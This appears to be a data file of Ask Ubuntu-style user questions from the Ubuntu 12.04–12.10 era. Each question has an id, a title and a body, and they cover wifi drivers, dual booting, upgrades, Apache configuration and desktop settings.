215860	how to fix a mail notifcation menu	i 'm getting a menu like this , do n't know why . i` m using the 12.10 i installed some notifcations and tried to move the notification applets actually the theme i`m using is ambience-dark some thing went wrong from that time all the menus are appearing like these getting some border arouund the text and background colour is white
215861	multi-display issues t61 on 12.04 tls	installed 12.04 lts on t61 laptop . i have issues on multi-displays . problems come when trying to make changes to multi displays and save . both screens blacken , when click the mouse noise on both screens appear
215870	how can i shutdown my pc when the system is idle ?	i am using ubutnu 12.04 lts . now i am here to know that , is there any script/application i can use to shutdown my ubuntu when my system is idle for 10 minutes or so ? i have already gone through this answer , but it does n't seems to be help me much and that package also not active from long time . any script/application i can get for this ? thank you all .
215879	problem trying to upgrade 10.04 to 12.04	i am trying to upgrade from10.04 to 12.04 . while setting new software channels i get the following errors : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/karmic/main/source/sources 404 not found [ ip : 91.189.91.15 80 ] , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/karmic/restricted/source/sources 404 not found [ ip : 91.189.91.15 80 ] ... ... ... ... ... ... ... ... ... ... . seven more errors of this type ... ... ... ... ... ... ... ... ... ... . , e : some index files failed to download . they have been ignored , or old ones used instead . and the upgrading process is stopped . thank you in advance .
215885	how to fix facebook , youtube problems in chrome with ubuntu 12.04	hey guys after installing ubuntu 12.04 i faced several problems with my graphics card . folowing this question : i was able to install my catalyst and everything seems ok . the only problem i have is chrome . facebook , youtube and maybe other sites are messed up.. i checked this question too but , i have already installed the correct drivers .
215887	ubuntu 12.10 on eee pc 1000 ?	i have an old asus netbook ( an eee pc 1000 ) that has been a traveling companion of mine for quite some time . i installed ubuntu on it after i bought it back in 2008 , and have been updating it with new releases as they 've come out . my needs for it have always been light : basically a machine for typing , either into libreoffice , the terminal , or a browser window . for most of its life the eee has had plenty of power to handle this . but with recent releases it 's started to get pretty slow -- it 's not uncommon for my typing to outpace the cursor , and browser windows frequently freeze up and gray out on javascript-intensive sites -- so i 've become more and more hesitant about making updates to avoid making the problem worse . currently it 's sitting on ubuntu 11.10 . i 've been thinking about bringing it up to date with 12.10 , but the slowness problem , combined with 12.10 ditching unity 2d , makes me wonder if it 's really suitable for this old piece of kit . the eee pc 1000 is pretty weak spec-wise -- atom cpu , 1gb ram , intel gma 950 integrated graphics . so i 'm thinking it may just not be up to running modern versions of ubuntu , since those have become increasingly gpu-intensive . the problem is that nobody really makes machines like this one anymore -- the netbook sector has been eaten up by tablets on the low end and ultrabooks on the high end . plus , call me old fashioned but i hate throwing away a perfectly good machine . have any of you tried running 12.10 on an eee 1000 or a similarly-spec'ed netbook ? how did it work out ?
215889	php `virtual ( ) ` with apache multiviews not working after upgrade to 12.04	i use php 's virtual ( ) directive quite a lot on one of my sites , including central elements . this worked fine for the last ~10 years -- but after upgrading to 12.04 it somehow got broken . example setup ( simplified ) to make it easier to understand , i simplify some things ( contents ) . so say i need a html fragment like < p > for further instructions , please look < a href='foobar ' > here < /p > in multiple pages . 10 years ago , i used ssi for that , so it is put into a file in a central place -- so if e.g . the targeted url changes , i only need to update it in one place . to serve multiple languages , i have apache 's multiviews enabled -- and at $ document_root/central/ there are the files : foobar.html ( english variant , and the default ) foobar.html.de ( german variant ) . now in the php code , i simply placed : < ? virtual ( `` /central/foobar '' ) ; ? > and let apache take care to deliver the correct language variant . the problem as said , this worked fine for about 10 years : german visitors got the german variant , all others the english ( depending on their preferred language ) . but after upgrading to ubuntu 12.04 , it no longer worked : either nothing was delivered from the virtual ( ) command , or ( in connection with framesets ) it even ended up in binary gibberish . trying to figure out what happens , i played with a lot of things . i first thought multiviews was ( somehow ) not available anymore -- but calling http : // < server > /central/foobar showed the right variant , depending on the configured language preferences . this also proved there was nothing wrong with file permissions . the error.log gave no clues either ( no error message thrown ) . finally , just as a `` last ressort '' , i changed the php command to < ? virtual ( `` central/foobar.html '' ) ; ? > -- and that very same file was in fact included . but the language dependend stuff obviously did no longer work . of course i tried to find some change ( most likely in php 's virtual ( ) command ) , using google a lot , and also searching the questions here -- unfortunately to no avail . finally : the question putting `` design questions '' aside ( surely today i would design things differently -- but at least currently i miss the time to change that for a quite huge amount of pages ) : what can be done to make it work again ? i surely missed something -- but i can not figure out what ... addition ( edit ) my remaining problem now is that as soon as the document needs to be negotiated ( e.g . has different language variants ) , virtual ( ) always adds the content at the very beginning of the generated document ( i.e . in front of the < html > tag ) -- regardless where it was placed . it however gets placed correctly when no negotiation is involved . any idea what 's going on there , and how to fix it ?
215890	dell inspiron 5720 wifi ( broadcom bcm43142 , ubuntu 12.10 )	i 've installed ubuntu 12.10 on dell inspiron 5720 . cant get wifi to work . sudo lshw -c network : *-network unclaimed description : network controller product : bcm43142 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f1500000-f1507fff installing b43-fwcutter/firmware-b43legacy-installer never gave any results . on b43 and b43 legacy website ( http : //wireless.kernel.org/en/users/drivers/b43 ) it 's said that bcm4313 is not there and not supported . i 've also tried kernel-remove-source and kernel-install-source and same command for headers , but got no results . how can i fix it ? help me please , thanks !
215893	empathy ca n't connect to facebook chat	i am using ubuntu 12.10 , and when i try to connect to my facebook account through empathy , it gets disconnected and says this account is already connected to the server .
215903	videos fast forwarding in ubuntu 12.04	whenever i play a video on youtube , it is automatically fast forwarded . i have searched lot about this here , but none of the solution worked . tried changing output in sound settings , also upgraded to latest flash player . my os is ubuntu 12.04 .
215908	how do i delete these files in the /root directory ?	i ran this command sudo find / -type d -name '*trash* ' | sudo xargs du -h | sort this was the output : 100m /root/.local/share/trash/files/recup_dir.2.30 100m /root/.local/share/trash/files/recup_dir.2.72 100m /root/.local/share/trash/files/recup_dir.32 101m /root/.local/share/trash/files/recup_dir.2.27 101m /root/.local/share/trash/files/recup_dir.29 103m /root/.local/share/trash/files/recup_dir.2.7 103m /root/.local/share/trash/files/recup_dir.9 103m /root/.local/share/trash/files/recup_dir.93 106m /root/.local/share/trash/files/recup_dir.187 106m /root/.local/share/trash/files/recup_dir.71 107m /root/.local/share/trash/files/recup_dir.131 107m /root/.local/share/trash/files/recup_dir.136 107m /root/.local/share/trash/files/recup_dir.2.46 107m /root/.local/share/trash/files/recup_dir.51 108m /root/.local/share/trash/files/recup_dir.106 108m /root/.local/share/trash/files/recup_dir.2.78 108m /root/.local/share/trash/files/recup_dir.52 109m /root/.local/share/trash/files/recup_dir.2.32 109m /root/.local/share/trash/files/recup_dir.34 110m /root/.local/share/trash/files/recup_dir.2.28 110m /root/.local/share/trash/files/recup_dir.2.53 110m /root/.local/share/trash/files/recup_dir.30 110m /root/.local/share/trash/files/recup_dir.55 110m /root/.local/share/trash/files/recup_dir.89 112m /root/.local/share/trash/files/recup_dir.2.31 112m /root/.local/share/trash/files/recup_dir.33 114m /root/.local/share/trash/files/recup_dir.2.29 114m /root/.local/share/trash/files/recup_dir.2.74 114m /root/.local/share/trash/files/recup_dir.31 115m /root/.local/share/trash/files/recup_dir.125 117m /root/.local/share/trash/files/recup_dir.83 118m /root/.local/share/trash/files/recup_dir.105 118m /root/.local/share/trash/files/recup_dir.2.70 119m /root/.local/share/trash/files/recup_dir.133 1.1g /root/.local/share/trash/files/recup_dir.148 11m /root/.local/share/trash/files/recup_dir.179 1.1m /root/.local/share/trash/info 122m /root/.local/share/trash/files/recup_dir.80 124m /root/.local/share/trash/files/recup_dir.137 125g /root/.local/share/trash 125g /root/.local/share/trash/files 125m /root/.local/share/trash/files/recup_dir.2.49 129m /root/.local/share/trash/files/recup_dir.153 1.2g /root/.local/share/trash/files/recup_dir.165 1.2g /root/.local/share/trash/files/recup_dir.166 12k /media/a80e1de60e1dae76/.trash-1000/files 12m /root/.local/share/trash/files/recup_dir.178 12m /root/.local/share/trash/files/recup_dir.180 12m /root/.local/share/trash/files/recup_dir.181 130m /root/.local/share/trash/files/recup_dir.85 137m /root/.local/share/trash/files/recup_dir.2.5 137m /root/.local/share/trash/files/recup_dir.7 137m /root/.local/share/trash/files/recup_dir.76 13m /root/.local/share/trash/files/recup_dir.143 13m /root/.local/share/trash/files/recup_dir.18 13m /root/.local/share/trash/files/recup_dir.182 13m /root/.local/share/trash/files/recup_dir.2.16 13m /root/.local/share/trash/files/recup_dir.2.2 13m /root/.local/share/trash/files/recup_dir.4 140m /root/.local/share/trash/files/recup_dir.2.77 145m /root/.local/share/trash/files/recup_dir.2.63 147m /root/.local/share/trash/files/recup_dir.2.43 147m /root/.local/share/trash/files/recup_dir.45 148m /root/.local/share/trash/files/recup_dir.84 149m /root/.local/share/trash/files/recup_dir.160 149m /root/.local/share/trash/files/recup_dir.2.79 1.4g /root/.local/share/trash/files/recup_dir.191 150m /root/.local/share/trash/files/recup_dir.2.26 150m /root/.local/share/trash/files/recup_dir.28 153m /root/.local/share/trash/files/recup_dir.64 153m /root/.local/share/trash/files/recup_dir.78 154m /root/.local/share/trash/files/recup_dir.107 155m /root/.local/share/trash/files/recup_dir.2.80 155m /root/.local/share/trash/files/recup_dir.79 15m /root/.local/share/trash/files/recup_dir.151 162m /root/.local/share/trash/files/recup_dir.65 163m /root/.local/share/trash/files/recup_dir.82 164m /root/.local/share/trash/files/recup_dir.104 165m /root/.local/share/trash/files/recup_dir.2.39 165m /root/.local/share/trash/files/recup_dir.41 168m /root/.local/share/trash/files/recup_dir.2.62 16m /root/.local/share/trash/files/recup_dir.171 170m /root/.local/share/trash/files/recup_dir.135 170m /root/.local/share/trash/files/recup_dir.159 171m /root/.local/share/trash/files/recup_dir.91 172m /root/.local/share/trash/files/recup_dir.2.41 172m /root/.local/share/trash/files/recup_dir.43 175m /root/.local/share/trash/files/recup_dir.2.33 175m /root/.local/share/trash/files/recup_dir.35 176m /root/.local/share/trash/files/recup_dir.2.76 179m /root/.local/share/trash/files/recup_dir.2.38 179m /root/.local/share/trash/files/recup_dir.40 179m /root/.local/share/trash/files/recup_dir.61 1.7g /root/.local/share/trash/files/recup_dir.167 17m /root/.local/share/trash/files/recup_dir.172 180m /root/.local/share/trash/files/recup_dir.186 181m /root/.local/share/trash/files/recup_dir.2.71 182m /root/.local/share/trash/files/recup_dir.158 183m /root/.local/share/trash/files/recup_dir.2.59 185m /root/.local/share/trash/files/recup_dir.123 189m /root/.local/share/trash/files/recup_dir.92 18m /root/.local/share/trash/files/recup_dir.142 18m /root/.local/share/trash/files/recup_dir.149 18m /root/.local/share/trash/files/recup_dir.150 18m /root/.local/share/trash/files/recup_dir.152 18m /root/.local/share/trash/files/recup_dir.173 18m /root/.local/share/trash/files/recup_dir.177 191m /root/.local/share/trash/files/recup_dir.147 193m /root/.local/share/trash/files/recup_dir.102 195m /root/.local/share/trash/files/recup_dir.73 196m /root/.local/share/trash/files/recup_dir.94 198m /root/.local/share/trash/files/recup_dir.2.58 19m /root/.local/share/trash/files/recup_dir.175 19m /root/.local/share/trash/files/recup_dir.176 205m /root/.local/share/trash/files/recup_dir.108 206m /root/.local/share/trash/files/recup_dir.56 206m /root/.local/share/trash/files/recup_dir.60 207m /root/.local/share/trash/files/recup_dir.2.55 209m /root/.local/share/trash/files/recup_dir.90 2.0g /root/.local/share/trash/files/recup_dir.190 20k /media/a80e1de60e1dae76/.trash-1000/info 20m /root/.local/share/trash/files/recup_dir.17 20m /root/.local/share/trash/files/recup_dir.2.15 210m /root/.local/share/trash/files/recup_dir.121 211m /root/.local/share/trash/files/recup_dir.134 212m /root/.local/share/trash/files/recup_dir.57 21m /root/.local/share/trash/files/recup_dir.174 223m /root/.local/share/trash/files/recup_dir.88 225m /root/.local/share/trash/files/recup_dir.118 230m /root/.local/share/trash/files/recup_dir.87 232m /root/.local/share/trash/files/recup_dir.66 235m /root/.local/share/trash/files/recup_dir.139 236m /root/.local/share/trash/files/recup_dir.97 238m /root/.local/share/trash/files/recup_dir.2.54 240m /root/.local/share/trash/files/recup_dir.163 241m /root/.local/share/trash/files/recup_dir.126 242m /root/.local/share/trash/files/recup_dir.2.81 243m /root/.local/share/trash/files/recup_dir.156 244m /root/.local/share/trash/files/recup_dir.2.37 244m /root/.local/share/trash/files/recup_dir.39 248m /root/.local/share/trash/files/recup_dir.110 249m /root/.local/share/trash/files/recup_dir.75 256m /root/.local/share/trash/files/recup_dir.2.73 257m /root/.local/share/trash/files/recup_dir.2.64 25m /root/.local/share/trash/files/recup_dir.10 25m /root/.local/share/trash/files/recup_dir.2.8 262m /root/.local/share/trash/files/recup_dir.86 266m /root/.local/share/trash/files/recup_dir.144 27m /root/.local/share/trash/files/recup_dir.99 282m /root/.local/share/trash/files/recup_dir.127 29m /root/.local/share/trash/files/recup_dir.183 29m /root/.local/share/trash/files/recup_dir.22 29m /root/.local/share/trash/files/recup_dir.2.20 316m /root/.local/share/trash/files/recup_dir.124 31m /root/.local/share/trash/files/recup_dir.2.21 31m /root/.local/share/trash/files/recup_dir.23 320m /root/.local/share/trash/files/recup_dir.168 32m /root/.local/share/trash/files/recup_dir.12 32m /root/.local/share/trash/files/recup_dir.2.10 334m /root/.local/share/trash/files/recup_dir.140 338m /root/.local/share/trash/files/recup_dir.69 33m /root/.local/share/trash/files/recup_dir.21 33m /root/.local/share/trash/files/recup_dir.2.19 340m /root/.local/share/trash/files/recup_dir.2.57 341m /root/.local/share/trash/files/recup_dir.185 342m /root/.local/share/trash/files/recup_dir.169 343m /root/.local/share/trash/files/recup_dir.129 346m /root/.local/share/trash/files/recup_dir.111 348m /root/.local/share/trash/files/recup_dir.103 351m /root/.local/share/trash/files/recup_dir.2.34 351m /root/.local/share/trash/files/recup_dir.36 352m /root/.local/share/trash/files/recup_dir.155 358m /root/.local/share/trash/files/recup_dir.59 36g /root/.local/share/trash/files/recup_dir.1 36g /root/.local/share/trash/files/recup_dir.2 36m /root/.local/share/trash/files/recup_dir.120 36m /root/.local/share/trash/files/recup_dir.2.24 36m /root/.local/share/trash/files/recup_dir.2.51 36m /root/.local/share/trash/files/recup_dir.26 37m /root/.local/share/trash/files/recup_dir.112 390m /root/.local/share/trash/files/recup_dir.162 398m /root/.local/share/trash/files/recup_dir.2.67 39m /root/.local/share/trash/files/recup_dir.145 401m /root/.local/share/trash/files/recup_dir.2.52 402m /root/.local/share/trash/files/recup_dir.54 408m /root/.local/share/trash/files/recup_dir.2.40 408m /root/.local/share/trash/files/recup_dir.42 4.0k /home/daniel/.local/share/trash 40k /media/a80e1de60e1dae76/.trash-1000 41m /root/.local/share/trash/files/recup_dir.13 41m /root/.local/share/trash/files/recup_dir.2.11 428m /root/.local/share/trash/files/recup_dir.2.61 434m /root/.local/share/trash/files/recup_dir.2.36 434m /root/.local/share/trash/files/recup_dir.38 43m /root/.local/share/trash/files/recup_dir.19 43m /root/.local/share/trash/files/recup_dir.2.17 43m /root/.local/share/trash/files/recup_dir.53 440m /root/.local/share/trash/files/recup_dir.157 448m /root/.local/share/trash/files/recup_dir.2.35 448m /root/.local/share/trash/files/recup_dir.37 44m /root/.local/share/trash/files/recup_dir.20 44m /root/.local/share/trash/files/recup_dir.2.18 454m /root/.local/share/trash/files/recup_dir.116 47m /root/.local/share/trash/files/recup_dir.11 47m /root/.local/share/trash/files/recup_dir.2.9 48m /root/.local/share/trash/files/recup_dir.2.48 495m /root/.local/share/trash/files/recup_dir.192 49m /root/.local/share/trash/files/recup_dir.114 49m /root/.local/share/trash/files/recup_dir.50 52m /root/.local/share/trash/files/recup_dir.3 538m /root/.local/share/trash/files/recup_dir.2.68 53m /root/.local/share/trash/files/recup_dir.95 54m /root/.local/share/trash/files/recup_dir.98 551m /root/.local/share/trash/files/recup_dir.63 57m /root/.local/share/trash/files/recup_dir.101 5.7m /root/.local/share/trash/files/recup_dir.119 57m /root/.local/share/trash/files/recup_dir.14 57m /root/.local/share/trash/files/recup_dir.2.12 581m /root/.local/share/trash/files/recup_dir.70 586m /root/.local/share/trash/files/recup_dir.170 588m /root/.local/share/trash/files/recup_dir.62 58m /root/.local/share/trash/files/recup_dir.2.4 58m /root/.local/share/trash/files/recup_dir.2.42 58m /root/.local/share/trash/files/recup_dir.44 58m /root/.local/share/trash/files/recup_dir.6 59m /root/.local/share/trash/files/recup_dir.2.22 59m /root/.local/share/trash/files/recup_dir.24 603m /root/.local/share/trash/files/recup_dir.109 60m /root/.local/share/trash/files/recup_dir.15 60m /root/.local/share/trash/files/recup_dir.2.13 619m /root/.local/share/trash/files/recup_dir.154 61m /root/.local/share/trash/files/recup_dir.2.23 61m /root/.local/share/trash/files/recup_dir.25 626m /root/.local/share/trash/files/recup_dir.138 62m /root/.local/share/trash/files/recup_dir.2.3 62m /root/.local/share/trash/files/recup_dir.5 63m /root/.local/share/trash/files/recup_dir.188 64m /root/.local/share/trash/files/recup_dir.2.1 65m /root/.local/share/trash/files/recup_dir.113 65m /root/.local/share/trash/files/recup_dir.146 69m /root/.local/share/trash/files/recup_dir.122 701m /root/.local/share/trash/files/recup_dir.2.60 71m /root/.local/share/trash/files/recup_dir.130 71m /root/.local/share/trash/files/recup_dir.141 72m /root/.local/share/trash/files/recup_dir.132 72m /root/.local/share/trash/files/recup_dir.2.47 74m /root/.local/share/trash/files/recup_dir.16 74m /root/.local/share/trash/files/recup_dir.2.14 74m /root/.local/share/trash/files/recup_dir.2.25 74m /root/.local/share/trash/files/recup_dir.2.45 74m /root/.local/share/trash/files/recup_dir.27 74m /root/.local/share/trash/files/recup_dir.47 751m /root/.local/share/trash/files/recup_dir.164 752m /root/.local/share/trash/files/recup_dir.128 76m /root/.local/share/trash/files/recup_dir.49 77m /root/.local/share/trash/files/recup_dir.115 77m /root/.local/share/trash/files/recup_dir.77 8.0k /media/a80e1de60e1dae76/.trash-1000/expunged 810m /root/.local/share/trash/files/recup_dir.58 815m /root/.local/share/trash/files/recup_dir.2.66 818m /root/.local/share/trash/files/recup_dir.2.56 82m /root/.local/share/trash/files/recup_dir.2.44 82m /root/.local/share/trash/files/recup_dir.46 835m /root/.local/share/trash/files/recup_dir.68 84m /root/.local/share/trash/files/recup_dir.189 860m /root/.local/share/trash/files/recup_dir.161 86m /root/.local/share/trash/files/recup_dir.117 86m /root/.local/share/trash/files/recup_dir.2.69 86m /root/.local/share/trash/files/recup_dir.2.75 90m /root/.local/share/trash/files/recup_dir.74 924m /root/.local/share/trash/files/recup_dir.184 94m /root/.local/share/trash/files/recup_dir.81 95m /root/.local/share/trash/files/recup_dir.100 96m /root/.local/share/trash/files/recup_dir.2.6 96m /root/.local/share/trash/files/recup_dir.2.65 96m /root/.local/share/trash/files/recup_dir.8 97m /root/.local/share/trash/files/recup_dir.2.50 97m /root/.local/share/trash/files/recup_dir.67 97m /root/.local/share/trash/files/recup_dir.72 98m /root/.local/share/trash/files/recup_dir.96 99m /root/.local/share/trash/files/recup_dir.48 how do i delete these files ?
215911	unable to enable compiz animations	i`m using ubuntu 12.10 unity and i installed compiz i`ve enable animations and custmized how i like but none of the animations are not working my laptop model is hp-dv7t-quadediton i7 processor , ati graphics hd 6490m
215918	how to write appindicators in python ?	i 'm looking to try and develop some simple indicators , for numlock/capslock and brigthness , etc . how would i go about creating indicators in python ? are there any tutorials that walk me through writing my first appindicator ( like for apps in quickly ) ? any easy solutions for starting like quickly templates ?
215920	3.5.0-18 kernel update broke bcm43228	after updating the kernel to 3.5.0-18 the broadcom bcm43228 wireless card of my acer aspire one 756 has stopped working properly . the card often refuses to connect to my ap , and if it connects it behaves very unstable . i have already reinstalled the drivers , as recommended by googling around . as far as i can tell the only driver that supports my card is the bcmwl package . i found one solution saying i should install broadcom-sta using module assistant , however i could not get this to install and apparently broadcom-sta and bcmwl are effectively the same driver ? is anyone experiencing similar issues ? is it possible to just downgrade to the previous kernel version ?
215925	what is python3mu ?	i 'm setting up pydev for eclipse , and i have to choose a version of python for the interpretor . i want to use python3 , and i 've been using python3 as my interpretor , so i thought /usr/bin/python3 would have been the obvious choice . however , another option there is python3mu . i ran this in the terminal and it seemed to function exactly like python3 . my questions are : which one is the correct one to use as the interpretor for eclipse ? and what is the difference between the two ? edit : just wanted to let you guys know that my google-fu was not good enough to find out what python3mu was .
215926	strange font rendering when using tahoma	when using tahoma ( antialias off ) , i get something like this : any idea ? ( see bookmarks , computer and networks 'bold ' in left panel ) thanks for advice
215929	is 12.10 incompatible with a 2011 lenovo computer ?	i apologize that i ca n't say the specific model of the laptop ; it is currently being repaired and i have not written it down . the installation of 12.10 went off without a hitch , but after turning it off for the first time i found that my device froze at the bios screen and failed to respond to any input methods . i looked up this problem and found that in most cases it has to do with problematic hardware , so i took the laptop into a local repair shop and the clerk opened up the case and said that there was nothing wrong inside ; that the problem was that the operating system is incompatible with the device . this strikes me as unlikely , as the device is less than two years old and was one of the higher-end models . my question is this : is ubuntu 12.10 really incompatible with my recent device , or is the clerk just swindling me by charging for the extra service or re-installing windows 7 ?
215934	use and effects of `` /media '' partion	hello everyone i want to install ubuntu but the `` /media '' partition wich is used to comunicate with windows comes everytime on my mind cause i read it can reduce your memory flexibility i would like to know it 's use and i have 45gb for installing ubuntu i 'd like to know if i could do it without fearing nothing i would also want to now if such partition use memory space.thanks another question i have burn ubuntu iso as data but it wo n't boot the computer wait a little time and starts with windows i have put the boot from cd in the first position on the bios
215935	download problems	i have ubuntu with kernel 3.0.0-19.33-generic . the system crashed after an upload . it opens to a white screen now . i get an error report ( error 2 , no such directory or file ) . i have tried to install ubuntu 12.10 , it fails . where do i go from here ? do need to reinstall ubuntu ?
215936	ubuntu 12.04 does not detect already installed windows 7	i have already installed windows 7 ultimate . when i tried to install ubuntu 12.04 , installer did n't detect windows even i have only two primary and two logical partition on windows when i goes through try ubuntu and use command `` os-prober '' it shows output like as unshare failed : operation not permitted error : you must be root error : you must be root error : you must be root error : you must be root error : you must be root error : you must be root mkdir : can not create directory `/var/lib/os-prober/mount ' : permission denied mkdir : can not create directory `/var/lib/os-prober/mount ' : permission denied mkdir : can not create directory `/var/lib/os-prober/mount ' : permission denied mkdir : can not create directory `/var/lib/os-prober/mount ' : permission denied mkdir : can not create directory `/var/lib/os-prober/mount ' : permission denied '' please help me . what should i do ?
215945	change resolution in waking mars	i purchased and installed the humble bundle game `` waking mars '' via the ubuntu software center and it works really well except for some issues with changing settings , namely with the resolution . the in-game settings for changing resolution and entering/exiting fullscreen were easy enough to find and toggle , and when you do it asks to restart the application . when you restart it , all other settings you updated are reflected except for the changes to the resolution . ( i 'm trying to get it to play in windowed mode that fits onto one monitor , but it will only default to windowed mode with the full dual monitor resolution ) . i noticed that it writes these values to ~/.local/share/wakingmars/usersettings.ini . when i change the resolution , it is properly written to in this settings file ... but it never is reflected when you restart the application . any ideas what 's wrong ?
215958	toshiba `` eco mode '' equivalent	i have a toshiba satellite r830 dual-boot ubuntu 12.10 and windows 7 . on windows , when i turn `` eco mode '' on , the fan is much more silent and temperatures are considerably lower . on ubuntu , eco mode does not work . is there an alternative way to `` throttle '' the processor or limit power consumption with the final aim being to keep temperatures low and maybe extend battery life ?
215960	reason why windows ca n't be installed on ubuntu , any help though ?	well i got my windows vista .iso file , i put it on my usb drive , extracted , then i restarted and went to `` boot device options '' clicked `` generic usb '' ( what i labeled when i formatted ) then it stood on a black screen for 15 minutes , then just went to ubuntu , now i found out exactly what happened why windows wont work on ubuntu is a simple reason not if you save it in nfts format or msdos ( both windows formats ) , not if you use anything special , this even applies to the ubuntu downloader , one specific reason that i just noticed , since wine ( windows application loader ) ca n't run while you click the usb , you ca n't open the setup.exe file needed to install the operating system , that means you can not install it at all if it is a .exe installer file , then what can we do ? only other way is to make a partition with gparted , put a partition , then install wine , then run your windows setup.exe file , then wine will load it up ! why not to open setup.exe before you make a partition - simple , it wont work ! i have tried , it says you need __ amount of space and can be put on any partition , yeah , any partition not being used here is where i need your help ! - i want to make a partition but they all show as locked when i open gparted , so how am i supposed to open them up ? get a hammer and tell hp my laptop did n't want to open its partitions ? nope , i need some help on how to unlock the partitions or what to do , thank you in advance ps- if i could , i would put a bounty to this but i do not have enough reputation !
215961	where 's the launcher in 12.10 ?	i just installed ubuntu 12.10 desktop via usb key nicely , but i do n't see the launcher ? am i missing something here ? how is this possible ? this os is useless without firefox or a web browser !
215966	ethernet problems in ubuntu 12.04	so today i popped out my hdd with ubuntu on it and put in a fresh hdd and installed win8 ( wanted to try it ) . i got everything installed , upp and running and decided to go back to ubuntu ( for obvious reasons lol ) but when i boot back into ubuntu my internet connection will not connect . i booted into a live cd of ubuntu and it still would not work . i thought i blew up my onboard port so i booted back into win8 and the internet worked without flaw . so i booted back into my ubuntu install and i have a usb to ethernet adapter that im using but i still cant get my onboard to connect . any ideas ? lspci output : jeffy @ jeffy : ~ $ lspci 00:00.0 host bridge : advanced micro devices [ amd ] nee ati radeon xpress 200 host bridge ( rev 01 ) 00:01.0 pci bridge : advanced micro devices [ amd ] nee ati rs480 pci bridge 00:11.0 ide interface : advanced micro devices [ amd ] nee ati ixp sb400 serial ata controller ( rev 80 ) 00:12.0 ide interface : advanced micro devices [ amd ] nee ati ixp sb400 serial ata controller ( rev 80 ) 00:13.0 usb controller : advanced micro devices [ amd ] nee ati ixp sb400 usb host controller ( rev 80 ) 00:13.1 usb controller : advanced micro devices [ amd ] nee ati ixp sb400 usb host controller ( rev 80 ) 00:13.2 usb controller : advanced micro devices [ amd ] nee ati ixp sb400 usb2 host controller ( rev 80 ) 00:14.0 smbus : advanced micro devices [ amd ] nee ati ixp sb400 smbus controller ( rev 82 ) 00:14.1 ide interface : advanced micro devices [ amd ] nee ati ixp sb400 ide controller ( rev 80 ) 00:14.2 audio device : advanced micro devices [ amd ] nee ati ixp sb4x0 high definition audio controller ( rev 01 ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati ixp sb400 pci-isa bridge ( rev 80 ) 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati ixp sb400 pci-pci bridge ( rev 80 ) 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rc410 [ radeon xpress 200 ] 02:02.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) 02:06.0 firewire ( ieee 1394 ) : lsi corporation fw322/323 ( rev 61 )
215969	prevent apache restarting automatically after upgrading packages	following on from an earlier question : is there a way to download security updates and notify admin without installing the update ? a large number of packages interact with apache ( especially php ) such that security updates to those packages can cause the server to attempt to restart the service . while my earlier question was answered , i 'm now thinking that i need a different solution . so - is there are way to allow security updates to be applied using apt , have an email sent to an administrator , and , most importantly , prevent services from being restarted at the end of the installation/update process ? the administrator will then be able to log in and restart the service manually .
215970	cant get ubuntu to work with windows 8	ive been trying to dual boot ubuntu with windows 8 but so far i have n't been able too . the laptop im using is a hp pavilion g6-2240sa pre-installed with windows 8. ive made the bootbale usb with ubuntu 12.10 , it installs but when i restart the computer boot straight into windows , no grub boot options . i can get into ubuntu once by doing an advanced restart and booting from the ubuntu partition . i can use ubuntu fine but once i restart or shutdown , i do the advanced restart again and the ubuntu partition is now gone and i have to reinstall . i used this tutorial to install ubuntu , http : //www.youtube.com/watch ? v=wncsbtyuzom after i have to reinstall and still no grub boot menu , i used the boot repair to re-install it . once i rebooted the computer it went straight to windows again and the ubuntu partition was gone . can i dual boot windows 8 and unbuntu 12.10 with the grub so i can pick what os to boot into when the computer is starting , and without the partition going awol ? ? ? ? thanks in advance
215976	there is no two finger scroll option in my `` mouse and touchpad '' settings	i simply do not have the option for `` two-finger scrolling '' available in my `` mouse and touchpad '' settings . i have tried a lot of terminal commands that i have found in the forums with no success . who has a solution that will enable two-finger scrolling ? a little about me : ubuntu 12.04.1 lts \n \l built-in pointing device type : mouse interface : ps/2 buttons : 2 ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 synaptics touchpad id=15 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ webcam sc-13hdl10931n id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=14 [ slave keyboard ( 3 ) ] screenshot of system settings :
215983	how to create a partition in gparted ?	how should i create a partition in gparted so i can install windows vista/8 on it ? i would really like to put windows alone or dual-boot ( i would be so grateful for dual-boot since i love ubuntu , but i need windows at the same time ! ) here is the explanation , i have a 220 gb hard drive on , i want to resize it to 100 gb , then the rest as a new partition , how do i do that ? liveusb ? gparted ?
215989	java graphics slow ubuntu 12.10	i have a java application i am developing and i would like to use ubuntu to work on it at home . the application displays some images and allows a user to pan and view . the same application runs smoothly on a lower spec windows machine at work . when i tested it on my much more powerful ubuntu laptop the graphics are slow and jumpy . i played around with different versions of java until i found the trick to add the argument -dsun.java2d.pmoffscreen and this has fixed it . could someone explain why this works and what is going on ?
215992	usb keyboard does n't work server installation 12.10	usb keyboard does n't work server installation 12.10 . i can get till the language selection screen and later no response to keyboard . need help .
216001	sudo apt-get update is not working in ubuntu after a fresh install	recently i install ubuntu 12.10 , after install , i am going to update ubuntu , so i open terminal , and write `` sudo apt-get update `` then more than 1 hour has spend it wo n't finished . any suggestion ...
